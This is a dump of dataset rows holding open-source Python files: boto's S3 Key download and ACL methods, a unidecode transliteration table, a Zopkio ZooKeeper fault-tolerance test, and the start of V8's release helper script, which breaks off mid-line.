present, will be used as the MD5 values of the\n file. Otherwise, the checksum will be computed.\n\n :type reduced_redundancy: bool\n :param reduced_redundancy: If True, this will set the storage\n class of the new Key to be REDUCED_REDUNDANCY. The Reduced\n Redundancy Storage (RRS) feature of S3, provides lower\n redundancy at lower storage cost.\n\n :type encrypt_key: bool\n :param encrypt_key: If True, the new copy of the object will\n be encrypted on the server-side by S3 and will be stored\n in an encrypted form while at rest in S3.\n \"\"\"\n if not isinstance(string_data, bytes):\n string_data = string_data.encode(\"utf-8\")\n fp = BytesIO(string_data)\n r = self.set_contents_from_file(fp, headers, replace, cb, num_cb,\n policy, md5, reduced_redundancy,\n encrypt_key=encrypt_key)\n fp.close()\n return r\n\n def get_file(self, fp, headers=None, cb=None, num_cb=10,\n torrent=False, version_id=None, override_num_retries=None,\n response_headers=None):\n \"\"\"\n Retrieves a file from an S3 Key\n\n :type fp: file\n :param fp: File pointer to put the data into\n\n :type headers: string\n :param: headers to send when retrieving the files\n\n :type cb: function\n :param cb: a callback function that will be called to report\n progress on the upload. The callback should accept two\n integer parameters, the first representing the number of\n bytes that have been successfully transmitted to S3 and\n the second representing the size of the to be transmitted\n object.\n\n :type cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file transfer.\n\n :type torrent: bool\n :param torrent: Flag for whether to get a torrent for the file\n\n :type override_num_retries: int\n :param override_num_retries: If not None will override configured\n num_retries parameter for underlying GET.\n\n :type response_headers: dict\n :param response_headers: A dictionary containing HTTP\n headers/values that will override any headers associated\n with the stored object in the response. See\n http://goo.gl/EWOPb for details.\n\n :type version_id: str\n :param version_id: The ID of a particular version of the object.\n If this parameter is not supplied but the Key object has\n a ``version_id`` attribute, that value will be used when\n retrieving the object. You can set the Key object's\n ``version_id`` attribute to None to always grab the latest\n version from a version-enabled bucket.\n \"\"\"\n self._get_file_internal(fp, headers=headers, cb=cb, num_cb=num_cb,\n torrent=torrent, version_id=version_id,\n override_num_retries=override_num_retries,\n response_headers=response_headers,\n hash_algs=None,\n query_args=None)\n\n def _get_file_internal(self, fp, headers=None, cb=None, num_cb=10,\n torrent=False, version_id=None, override_num_retries=None,\n response_headers=None, hash_algs=None, query_args=None):\n if headers is None:\n headers = {}\n save_debug = self.bucket.connection.debug\n if self.bucket.connection.debug == 1:\n self.bucket.connection.debug = 0\n\n query_args = query_args or []\n if torrent:\n query_args.append('torrent')\n\n if hash_algs is None and not torrent:\n hash_algs = {'md5': md5}\n digesters = dict((alg, hash_algs[alg]()) for alg in hash_algs or {})\n\n # If a version_id is passed in, use that. If not, check to see\n # if the Key object has an explicit version_id and, if so, use that.\n # Otherwise, don't pass a version_id query param.\n if version_id is None:\n version_id = self.version_id\n if version_id:\n query_args.append('versionId=%s' % version_id)\n if response_headers:\n for key in response_headers:\n query_args.append('%s=%s' % (\n key, urllib.parse.quote(response_headers[key])))\n query_args = '&'.join(query_args)\n self.open('r', headers, query_args=query_args,\n override_num_retries=override_num_retries)\n\n data_len = 0\n if cb:\n if self.size is None:\n cb_size = 0\n else:\n cb_size = self.size\n if self.size is None and num_cb != -1:\n # If size is not available due to chunked transfer for example,\n # we'll call the cb for every 1MB of data transferred.\n cb_count = (1024 * 1024) / self.BufferSize\n elif num_cb > 1:\n cb_count = int(math.ceil(cb_size/self.BufferSize/(num_cb-1.0)))\n elif num_cb < 0:\n cb_count = -1\n else:\n cb_count = 0\n i = 0\n cb(data_len, cb_size)\n try:\n for bytes in self:\n fp.write(bytes)\n data_len += len(bytes)\n for alg in digesters:\n digesters[alg].update(bytes)\n if cb:\n if cb_size > 0 and data_len >= cb_size:\n break\n i += 1\n if i == cb_count or cb_count == -1:\n cb(data_len, cb_size)\n i = 0\n except IOError as e:\n if e.errno == errno.ENOSPC:\n raise StorageDataError('Out of space for destination file '\n '%s' % fp.name)\n raise\n if cb and (cb_count <= 1 or i > 0) and data_len > 0:\n cb(data_len, cb_size)\n for alg in digesters:\n self.local_hashes[alg] = digesters[alg].digest()\n if self.size is None and not torrent and \"Range\" not in headers:\n self.size = data_len\n self.close()\n self.bucket.connection.debug = save_debug\n\n def get_torrent_file(self, fp, headers=None, cb=None, num_cb=10):\n \"\"\"\n Get a torrent file (see to get_file)\n\n :type fp: file\n :param fp: The file pointer of where to put the torrent\n\n :type headers: dict\n :param headers: Headers to be passed\n\n :type cb: function\n :param cb: a callback function that will be called to report\n progress on the upload. The callback should accept two\n integer parameters, the first representing the number of\n bytes that have been successfully transmitted to S3 and\n the second representing the size of the to be transmitted\n object.\n\n :type cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file transfer.\n\n \"\"\"\n return self.get_file(fp, headers, cb, num_cb, torrent=True)\n\n def get_contents_to_file(self, fp, headers=None,\n cb=None, num_cb=10,\n torrent=False,\n version_id=None,\n res_download_handler=None,\n response_headers=None):\n \"\"\"\n Retrieve an object from S3 using the name of the Key object as the\n key in S3. Write the contents of the object to the file pointed\n to by 'fp'.\n\n :type fp: File -like object\n :param fp:\n\n :type headers: dict\n :param headers: additional HTTP headers that will be sent with\n the GET request.\n\n :type cb: function\n :param cb: a callback function that will be called to report\n progress on the upload. The callback should accept two\n integer parameters, the first representing the number of\n bytes that have been successfully transmitted to S3 and\n the second representing the size of the to be transmitted\n object.\n\n :type cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file transfer.\n\n :type torrent: bool\n :param torrent: If True, returns the contents of a torrent\n file as a string.\n\n :type res_upload_handler: ResumableDownloadHandler\n :param res_download_handler: If provided, this handler will\n perform the download.\n\n :type response_headers: dict\n :param response_headers: A dictionary containing HTTP\n headers/values that will override any headers associated\n with the stored object in the response. See\n http://goo.gl/EWOPb for details.\n\n :type version_id: str\n :param version_id: The ID of a particular version of the object.\n If this parameter is not supplied but the Key object has\n a ``version_id`` attribute, that value will be used when\n retrieving the object. You can set the Key object's\n ``version_id`` attribute to None to always grab the latest\n version from a version-enabled bucket.\n \"\"\"\n if self.bucket is not None:\n if res_download_handler:\n res_download_handler.get_file(self, fp, headers, cb, num_cb,\n torrent=torrent,\n version_id=version_id)\n else:\n self.get_file(fp, headers, cb, num_cb, torrent=torrent,\n version_id=version_id,\n response_headers=response_headers)\n\n def get_contents_to_filename(self, filename, headers=None,\n cb=None, num_cb=10,\n torrent=False,\n version_id=None,\n res_download_handler=None,\n response_headers=None):\n \"\"\"\n Retrieve an object from S3 using the name of the Key object as the\n key in S3. Store contents of the object to a file named by 'filename'.\n See get_contents_to_file method for details about the\n parameters.\n\n :type filename: string\n :param filename: The filename of where to put the file contents\n\n :type headers: dict\n :param headers: Any additional headers to send in the request\n\n :type cb: function\n :param cb: a callback function that will be called to report\n progress on the upload. The callback should accept two\n integer parameters, the first representing the number of\n bytes that have been successfully transmitted to S3 and\n the second representing the size of the to be transmitted\n object.\n\n :type num_cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file transfer.\n\n :type torrent: bool\n :param torrent: If True, returns the contents of a torrent file\n as a string.\n\n :type res_upload_handler: ResumableDownloadHandler\n :param res_download_handler: If provided, this handler will\n perform the download.\n\n :type response_headers: dict\n :param response_headers: A dictionary containing HTTP\n headers/values that will override any headers associated\n with the stored object in the response. See\n http://goo.gl/EWOPb for details.\n\n :type version_id: str\n :param version_id: The ID of a particular version of the object.\n If this parameter is not supplied but the Key object has\n a ``version_id`` attribute, that value will be used when\n retrieving the object. You can set the Key object's\n ``version_id`` attribute to None to always grab the latest\n version from a version-enabled bucket.\n \"\"\"\n try:\n with open(filename, 'wb') as fp:\n self.get_contents_to_file(fp, headers, cb, num_cb,\n torrent=torrent,\n version_id=version_id,\n res_download_handler=res_download_handler,\n response_headers=response_headers)\n except Exception:\n os.remove(filename)\n raise\n # if last_modified date was sent from s3, try to set file's timestamp\n if self.last_modified is not None:\n try:\n modified_tuple = email.utils.parsedate_tz(self.last_modified)\n modified_stamp = int(email.utils.mktime_tz(modified_tuple))\n os.utime(fp.name, (modified_stamp, modified_stamp))\n except Exception:\n pass\n\n def get_contents_as_string(self, headers=None,\n cb=None, num_cb=10,\n torrent=False,\n version_id=None,\n response_headers=None, encoding=None):\n \"\"\"\n Retrieve an object from S3 using the name of the Key object as the\n key in S3. Return the contents of the object as a string.\n See get_contents_to_file method for details about the\n parameters.\n\n :type headers: dict\n :param headers: Any additional headers to send in the request\n\n :type cb: function\n :param cb: a callback function that will be called to report\n progress on the upload. The callback should accept two\n integer parameters, the first representing the number of\n bytes that have been successfully transmitted to S3 and\n the second representing the size of the to be transmitted\n object.\n\n :type cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file transfer.\n\n :type torrent: bool\n :param torrent: If True, returns the contents of a torrent file\n as a string.\n\n :type response_headers: dict\n :param response_headers: A dictionary containing HTTP\n headers/values that will override any headers associated\n with the stored object in the response. See\n http://goo.gl/EWOPb for details.\n\n :type version_id: str\n :param version_id: The ID of a particular version of the object.\n If this parameter is not supplied but the Key object has\n a ``version_id`` attribute, that value will be used when\n retrieving the object. You can set the Key object's\n ``version_id`` attribute to None to always grab the latest\n version from a version-enabled bucket.\n\n :type encoding: str\n :param encoding: The text encoding to use, such as ``utf-8``\n or ``iso-8859-1``. If set, then a string will be returned.\n Defaults to ``None`` and returns bytes.\n\n :rtype: bytes or str\n :returns: The contents of the file as bytes or a string\n \"\"\"\n fp = BytesIO()\n self.get_contents_to_file(fp, headers, cb, num_cb, torrent=torrent,\n version_id=version_id,\n response_headers=response_headers)\n value = fp.getvalue()\n\n if encoding is not None:\n value = value.decode(encoding)\n\n return value\n\n def add_email_grant(self, permission, email_address, headers=None):\n \"\"\"\n Convenience method that provides a quick way to add an email grant\n to a key. This method retrieves the current ACL, creates a new\n grant based on the parameters passed in, adds that grant to the ACL\n and then PUT's the new ACL back to S3.\n\n :type permission: string\n :param permission: The permission being granted. Should be one of:\n (READ, WRITE, READ_ACP, WRITE_ACP, FULL_CONTROL).\n\n :type email_address: string\n :param email_address: The email address associated with the AWS\n account your are granting the permission to.\n\n :type recursive: boolean\n :param recursive: A boolean value to controls whether the\n command will apply the grant to all keys within the bucket\n or not. The default value is False. By passing a True\n value, the call will iterate through all keys in the\n bucket and apply the same grant to each key. CAUTION: If\n you have a lot of keys, this could take a long time!\n \"\"\"\n policy = self.get_acl(headers=headers)\n policy.acl.add_email_grant(permission, email_address)\n self.set_acl(policy, headers=headers)\n\n def add_user_grant(self, permission, user_id, headers=None,\n display_name=None):\n \"\"\"\n Convenience method that provides a quick way to add a canonical\n user grant to a key. This method retrieves the current ACL,\n creates a new grant based on the parameters passed in, adds that\n grant to the ACL and then PUT's the new ACL back to S3.\n\n :type permission: string\n :param permission: The permission being granted. Should be one of:\n (READ, WRITE, READ_ACP, WRITE_ACP, FULL_CONTROL).\n\n :type user_id: string\n :param user_id: The canonical user id associated with the AWS\n account your are granting the permission to.\n\n :type display_name: string\n :param display_name: An option string containing the user's\n Display Name. Only required on Walrus.\n \"\"\"\n policy = self.get_acl(headers=headers)\n policy.acl.add_user_grant(permission, user_id,\n display_name=display_name)\n self.set_acl(policy, headers=headers)\n\n def _normalize_metadata(self, metadata):\n if type(metadata) == set:\n norm_metadata = set()\n for k in metadata:\n norm_metadata.add(k.lower())\n else:\n norm_metadata = {}\n for k in metadata:\n norm_metadata[k.lower()] = metadata[k]\n return norm_metadata\n\n def _get_remote_metadata(self, headers=None):\n \"\"\"\n Extracts metadata from existing URI into a dict, so we can\n overwrite/delete from it to form the new set of metadata to apply to a\n key.\n \"\"\"\n metadata = {}\n for underscore_name in self._underscore_base_user_settable_fields:\n if hasattr(self, underscore_name):\n value = getattr(self, underscore_name)\n if value:\n # Generate HTTP field name corresponding to \"_\" named field.\n field_name = underscore_name.replace('_', '-')\n metadata[field_name.lower()] = value\n # self.metadata contains custom metadata, which are all user-settable.\n prefix = self.provider.metadata_prefix\n for underscore_name in self.metadata:\n field_name = underscore_name.replace('_', '-')\n metadata['%s%s' % (prefix, field_name.lower())] = (\n self.metadata[underscore_name])\n return metadata\n\n def set_remote_metadata(self, metadata_plus, metadata_minus, preserve_acl,\n headers=None):\n metadata_plus = self._normalize_metadata(metadata_plus)\n metadata_minus = self._normalize_metadata(metadata_minus)\n metadata = self._get_remote_metadata()\n metadata.update(metadata_plus)\n for h in metadata_minus:\n if h in metadata:\n del metadata[h]\n src_bucket = self.bucket\n # Boto prepends the meta prefix when adding headers, so strip prefix in\n # metadata before sending back in to copy_key() call.\n rewritten_metadata = {}\n for h in metadata:\n if (h.startswith('x-goog-meta-') or h.startswith('x-amz-meta-')):\n rewritten_h = (h.replace('x-goog-meta-', '')\n .replace('x-amz-meta-', ''))\n else:\n rewritten_h = h\n rewritten_metadata[rewritten_h] = metadata[h]\n metadata = rewritten_metadata\n src_bucket.copy_key(self.name, self.bucket.name, self.name,\n metadata=metadata, preserve_acl=preserve_acl,\n headers=headers)\n\n def restore(self, days, headers=None):\n \"\"\"Restore an object from an archive.\n\n :type days: int\n :param days: The lifetime of the restored object (must\n be at least 1 day). If the object is already restored\n then this parameter can be used to readjust the lifetime\n of the restored object. In this case, the days\n param is with respect to the initial time of the request.\n If the object has not been restored, this param is with\n respect to the completion time of the request.\n\n \"\"\"\n response = self.bucket.connection.make_request(\n 'POST', self.bucket.name, self.name,\n data=self.RestoreBody % days,\n headers=headers, query_args='restore')\n if response.status not in (200, 202):\n provider = self.bucket.connection.provider\n raise provider.storage_response_error(response.status,\n response.reason,\n response.read())\n"},"license":{"kind":"string","value":"mit"}}},{"rowIdx":2450,"cells":{"repo_name":{"kind":"string","value":"menardorama/ReadyNAS-Add-ons"},"path":{"kind":"string","value":"headphones-1.0.0/files/etc/apps/headphones/lib/unidecode/x00e.py"},"copies":{"kind":"string","value":"252"},"size":{"kind":"string","value":"4092"},"content":{"kind":"string","value":"data = (\n'[?]', # 0x00\n'k', # 0x01\n'kh', # 0x02\n'kh', # 0x03\n'kh', # 0x04\n'kh', # 0x05\n'kh', # 0x06\n'ng', # 0x07\n'cch', # 0x08\n'ch', # 0x09\n'ch', # 0x0a\n'ch', # 0x0b\n'ch', # 0x0c\n'y', # 0x0d\n'd', # 0x0e\n't', # 0x0f\n'th', # 0x10\n'th', # 0x11\n'th', # 0x12\n'n', # 0x13\n'd', # 0x14\n't', # 0x15\n'th', # 0x16\n'th', # 0x17\n'th', # 0x18\n'n', # 0x19\n'b', # 0x1a\n'p', # 0x1b\n'ph', # 0x1c\n'f', # 0x1d\n'ph', # 0x1e\n'f', # 0x1f\n'ph', # 0x20\n'm', # 0x21\n'y', # 0x22\n'r', # 0x23\n'R', # 0x24\n'l', # 0x25\n'L', # 0x26\n'w', # 0x27\n's', # 0x28\n's', # 0x29\n's', # 0x2a\n'h', # 0x2b\n'l', # 0x2c\n'`', # 0x2d\n'h', # 0x2e\n'~', # 0x2f\n'a', # 0x30\n'a', # 0x31\n'aa', # 0x32\n'am', # 0x33\n'i', # 0x34\n'ii', # 0x35\n'ue', # 0x36\n'uue', # 0x37\n'u', # 0x38\n'uu', # 0x39\n'\\'', # 0x3a\n'[?]', # 0x3b\n'[?]', # 0x3c\n'[?]', # 0x3d\n'[?]', # 0x3e\n'Bh.', # 0x3f\n'e', # 0x40\n'ae', # 0x41\n'o', # 0x42\n'ai', # 0x43\n'ai', # 0x44\n'ao', # 0x45\n'+', # 0x46\n'', # 0x47\n'', # 0x48\n'', # 0x49\n'', # 0x4a\n'', # 0x4b\n'', # 0x4c\n'M', # 0x4d\n'', # 0x4e\n' * ', # 0x4f\n'0', # 0x50\n'1', # 0x51\n'2', # 0x52\n'3', # 0x53\n'4', # 0x54\n'5', # 0x55\n'6', # 0x56\n'7', # 0x57\n'8', # 0x58\n'9', # 0x59\n' // ', # 0x5a\n' /// ', # 0x5b\n'[?]', # 0x5c\n'[?]', # 0x5d\n'[?]', # 0x5e\n'[?]', # 0x5f\n'[?]', # 0x60\n'[?]', # 0x61\n'[?]', # 0x62\n'[?]', # 0x63\n'[?]', # 0x64\n'[?]', # 0x65\n'[?]', # 0x66\n'[?]', # 0x67\n'[?]', # 0x68\n'[?]', # 0x69\n'[?]', # 0x6a\n'[?]', # 0x6b\n'[?]', # 0x6c\n'[?]', # 0x6d\n'[?]', # 0x6e\n'[?]', # 0x6f\n'[?]', # 0x70\n'[?]', # 0x71\n'[?]', # 0x72\n'[?]', # 0x73\n'[?]', # 0x74\n'[?]', # 0x75\n'[?]', # 0x76\n'[?]', # 0x77\n'[?]', # 0x78\n'[?]', # 0x79\n'[?]', # 0x7a\n'[?]', # 0x7b\n'[?]', # 0x7c\n'[?]', # 0x7d\n'[?]', # 0x7e\n'[?]', # 0x7f\n'[?]', # 0x80\n'k', # 0x81\n'kh', # 0x82\n'[?]', # 0x83\n'kh', # 0x84\n'[?]', # 0x85\n'[?]', # 0x86\n'ng', # 0x87\n'ch', # 0x88\n'[?]', # 0x89\n's', # 0x8a\n'[?]', # 0x8b\n'[?]', # 0x8c\n'ny', # 0x8d\n'[?]', # 0x8e\n'[?]', # 0x8f\n'[?]', # 0x90\n'[?]', # 0x91\n'[?]', # 0x92\n'[?]', # 0x93\n'd', # 0x94\n'h', # 0x95\n'th', # 0x96\n'th', # 0x97\n'[?]', # 0x98\n'n', # 0x99\n'b', # 0x9a\n'p', # 0x9b\n'ph', # 0x9c\n'f', # 0x9d\n'ph', # 0x9e\n'f', # 0x9f\n'[?]', # 0xa0\n'm', # 0xa1\n'y', # 0xa2\n'r', # 0xa3\n'[?]', # 0xa4\n'l', # 0xa5\n'[?]', # 0xa6\n'w', # 0xa7\n'[?]', # 0xa8\n'[?]', # 0xa9\n's', # 0xaa\n'h', # 0xab\n'[?]', # 0xac\n'`', # 0xad\n'', # 0xae\n'~', # 0xaf\n'a', # 0xb0\n'', # 0xb1\n'aa', # 0xb2\n'am', # 0xb3\n'i', # 0xb4\n'ii', # 0xb5\n'y', # 0xb6\n'yy', # 0xb7\n'u', # 0xb8\n'uu', # 0xb9\n'[?]', # 0xba\n'o', # 0xbb\n'l', # 0xbc\n'ny', # 0xbd\n'[?]', # 0xbe\n'[?]', # 0xbf\n'e', # 0xc0\n'ei', # 0xc1\n'o', # 0xc2\n'ay', # 0xc3\n'ai', # 0xc4\n'[?]', # 0xc5\n'+', # 0xc6\n'[?]', # 0xc7\n'', # 0xc8\n'', # 0xc9\n'', # 0xca\n'', # 0xcb\n'', # 0xcc\n'M', # 0xcd\n'[?]', # 0xce\n'[?]', # 0xcf\n'0', # 0xd0\n'1', # 0xd1\n'2', # 0xd2\n'3', # 0xd3\n'4', # 0xd4\n'5', # 0xd5\n'6', # 0xd6\n'7', # 0xd7\n'8', # 0xd8\n'9', # 0xd9\n'[?]', # 0xda\n'[?]', # 0xdb\n'hn', # 0xdc\n'hm', # 0xdd\n'[?]', # 0xde\n'[?]', # 0xdf\n'[?]', # 0xe0\n'[?]', # 0xe1\n'[?]', # 0xe2\n'[?]', # 0xe3\n'[?]', # 0xe4\n'[?]', # 0xe5\n'[?]', # 0xe6\n'[?]', # 0xe7\n'[?]', # 0xe8\n'[?]', # 0xe9\n'[?]', # 0xea\n'[?]', # 0xeb\n'[?]', # 0xec\n'[?]', # 0xed\n'[?]', # 0xee\n'[?]', # 0xef\n'[?]', # 0xf0\n'[?]', # 0xf1\n'[?]', # 0xf2\n'[?]', # 0xf3\n'[?]', # 0xf4\n'[?]', # 0xf5\n'[?]', # 0xf6\n'[?]', # 0xf7\n'[?]', # 0xf8\n'[?]', # 0xf9\n'[?]', # 0xfa\n'[?]', # 0xfb\n'[?]', # 0xfc\n'[?]', # 0xfd\n'[?]', # 0xfe\n)\n"},"license":{"kind":"string","value":"gpl-2.0"}}},{"rowIdx":2451,"cells":{"repo_name":{"kind":"string","value":"pubnub/Zopkio"},"path":{"kind":"string","value":"examples/zookeeper/test_suites/zookeeper_test_faulttolerance.py"},"copies":{"kind":"string","value":"4"},"size":{"kind":"string","value":"1959"},"content":{"kind":"string","value":"# Copyright 2015 LinkedIn Corp.\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nimport os\nfrom kazoo.client import KazooClient\nfrom multiprocessing import Process\nimport time\n\nimport zopkio.runtime as runtime\nimport zopkio.test_utils as testutilities\nimport zopkio.adhoc_deployer as adhoc_deployer\n\n\nzookeper_deployer = None\ntest_phase = 2\n\ndef test_zookeeper_fault_tolerance():\n \"\"\"\n Kill zookeeper1 and see if other zookeeper instances are in quorum\n \"\"\"\n zookeper_deployer = runtime.get_deployer(\"zookeeper\")\n kazoo_connection_url = str(runtime.get_active_config('zookeeper_host') + ':2181')\n zkclient = KazooClient(hosts=kazoo_connection_url)\n\n zkclient.start()\n\n zkclient.ensure_path(\"/my/zookeeper_errorinjection\")\n # kill the Zookeeper1 instance\n print \"killing zoookeeper instance1\"\n zookeper_deployer.kill(\"zookeeper1\")\n time.sleep(20)\n zkclient.stop()\n\ndef validate_zookeeper_fault_tolerance():\n \"\"\"\n Validate that we can still connect to zookeeper instance 2 to read the node\n \"\"\"\n zk2 = KazooClient(hosts=str(runtime.get_active_config('zookeeper_host') + ':2182'))\n zk2.start()\n assert zk2.exists(\"/my/zookeeper_errorinjection/\"), \"zookeeper_errorinjection node not found\"\n\n zk2.stop()\n\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2452,"cells":{"repo_name":{"kind":"string","value":"Champii/runtime"},"path":{"kind":"string","value":"deps/v8/tools/release/common_includes.py"},"copies":{"kind":"string","value":"21"},"size":{"kind":"string","value":"29230"},"content":{"kind":"string","value":"#!/usr/bin/env python\n# Copyright 2013 the V8 project authors. All rights reserved.\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of Google Inc. nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport argparse\nimport datetime\nimport httplib\nimport glob\nimport imp\nimport json\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport textwrap\nimport time\nimport urllib\nimport urllib2\n\nfrom git_recipes import GitRecipesMixin\nfrom git_recipes import GitFailedException\n\nCHANGELOG_FILE = \"ChangeLog\"\nDAY_IN_SECONDS = 24 * 60 * 60\nPUSH_MSG_GIT_RE = re.compile(r\".* \\(based on (?P[a-fA-F0-9]+)\\)$\")\nPUSH_MSG_NEW_RE = re.compile(r\"^Version \\d+\\.\\d+\\.\\d+$\")\nVERSION_FILE = os.path.join(\"include\", \"v8-version.h\")\nVERSION_RE = re.compile(r\"^\\d+\\.\\d+\\.\\d+(?:\\.\\d+)?$\")\n\n# V8 base directory.\nV8_BASE = os.path.dirname(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n\ndef TextToFile(text, file_name):\n with open(file_name, \"w\") as f:\n f.write(text)\n\n\ndef AppendToFile(text, file_name):\n with open(file_name, \"a\") as f:\n f.write(text)\n\n\ndef LinesInFile(file_name):\n with open(file_name) as f:\n for line in f:\n yield line\n\n\ndef FileToText(file_name):\n with open(file_name) as f:\n return f.read()\n\n\ndef MSub(rexp, replacement, text):\n return re.sub(rexp, replacement, text, flags=re.MULTILINE)\n\n\ndef Fill80(line):\n # Replace tabs and remove surrounding space.\n line = re.sub(r\"\\t\", r\" \", line.strip())\n\n # Format with 8 characters indentation and line width 80.\n return textwrap.fill(line, width=80, initial_indent=\" \",\n subsequent_indent=\" \")\n\n\ndef MakeComment(text):\n return MSub(r\"^( ?)\", \"#\", text)\n\n\ndef StripComments(text):\n # Use split not splitlines to keep terminal newlines.\n return \"\\n\".join(filter(lambda x: not x.startswith(\"#\"), text.split(\"\\n\")))\n\n\ndef MakeChangeLogBody(commit_messages, auto_format=False):\n result = \"\"\n added_titles = set()\n for (title, body, author) in commit_messages:\n # TODO(machenbach): Better check for reverts. A revert should remove the\n # original CL from the actual log entry.\n title = title.strip()\n if auto_format:\n # Only add commits that set the LOG flag correctly.\n log_exp = r\"^[ \\t]*LOG[ \\t]*=[ \\t]*(?:(?:Y(?:ES)?)|TRUE)\"\n if not re.search(log_exp, body, flags=re.I | re.M):\n continue\n # Never include reverts.\n if title.startswith(\"Revert \"):\n continue\n # Don't include duplicates.\n if title in added_titles:\n continue\n\n # Add and format the commit's title and bug reference. Move dot to the end.\n added_titles.add(title)\n raw_title = re.sub(r\"(\\.|\\?|!)$\", \"\", title)\n bug_reference = MakeChangeLogBugReference(body)\n space = \" \" if bug_reference else \"\"\n result += \"%s\\n\" % Fill80(\"%s%s%s.\" % (raw_title, space, bug_reference))\n\n # Append the commit's author for reference if not in auto-format mode.\n if not auto_format:\n result += \"%s\\n\" % Fill80(\"(%s)\" % author.strip())\n\n result += \"\\n\"\n return result\n\n\ndef MakeChangeLogBugReference(body):\n \"\"\"Grep for \"BUG=xxxx\" lines in the commit message and convert them to\n \"(issue xxxx)\".\n \"\"\"\n crbugs = []\n v8bugs = []\n\n def AddIssues(text):\n ref = re.match(r\"^BUG[ \\t]*=[ \\t]*(.+)$\", text.strip())\n if not ref:\n return\n for bug in ref.group(1).split(\",\"):\n bug = bug.strip()\n match = re.match(r\"^v8:(\\d+)$\", bug)\n if match: v8bugs.append(int(match.group(1)))\n else:\n match = re.match(r\"^(?:chromium:)?(\\d+)$\", bug)\n if match: crbugs.append(int(match.group(1)))\n\n # Add issues to crbugs and v8bugs.\n map(AddIssues, body.splitlines())\n\n # Filter duplicates, sort, stringify.\n crbugs = map(str, sorted(set(crbugs)))\n v8bugs = map(str, sorted(set(v8bugs)))\n\n bug_groups = []\n def FormatIssues(prefix, bugs):\n if len(bugs) > 0:\n plural = \"s\" if len(bugs) > 1 else \"\"\n bug_groups.append(\"%sissue%s %s\" % (prefix, plural, \", \".join(bugs)))\n\n FormatIssues(\"\", v8bugs)\n FormatIssues(\"Chromium \", crbugs)\n\n if len(bug_groups) > 0:\n return \"(%s)\" % \", \".join(bug_groups)\n else:\n return \"\"\n\n\ndef SortingKey(version):\n \"\"\"Key for sorting version number strings: '3.11' > '3.2.1.1'\"\"\"\n version_keys = map(int, version.split(\".\"))\n # Fill up to full version numbers to normalize comparison.\n while len(version_keys) < 4: # pragma: no cover\n version_keys.append(0)\n # Fill digits.\n return \".\".join(map(\"{0:04d}\".format, version_keys))\n\n\n# Some commands don't like the pipe, e.g. calling vi from within the script or\n# from subscripts like git cl upload.\ndef Command(cmd, args=\"\", prefix=\"\", pipe=True, cwd=None):\n cwd = cwd or os.getcwd()\n # TODO(machenbach): Use timeout.\n cmd_line = \"%s %s %s\" % (prefix, cmd, args)\n print \"Command: %s\" % cmd_line\n print \"in %s\" % cwd\n sys.stdout.flush()\n try:\n if pipe:\n return subprocess.check_output(cmd_line, shell=True, cwd=cwd)\n else:\n return subprocess.check_call(cmd_line, shell=True, cwd=cwd)\n except subprocess.CalledProcessError:\n return None\n finally:\n sys.stdout.flush()\n sys.stderr.flush()\n\n\n# Wrapper for side effects.\nclass SideEffectHandler(object): # pragma: no cover\n def Call(self, fun, *args, **kwargs):\n return fun(*args, **kwargs)\n\n def Command(self, cmd, args=\"\", prefix=\"\", pipe=True, cwd=None):\n return Command(cmd, args, prefix, pipe, cwd=cwd)\n\n def ReadLine(self):\n return sys.stdin.readline().strip()\n\n def ReadURL(self, url, params=None):\n # pylint: disable=E1121\n url_fh = urllib2.urlopen(url, params, 60)\n try:\n return url_fh.read()\n finally:\n url_fh.close()\n\n def ReadClusterFuzzAPI(self, api_key, **params):\n params[\"api_key\"] = api_key.strip()\n params = urllib.urlencode(params)\n\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\"}\n\n conn 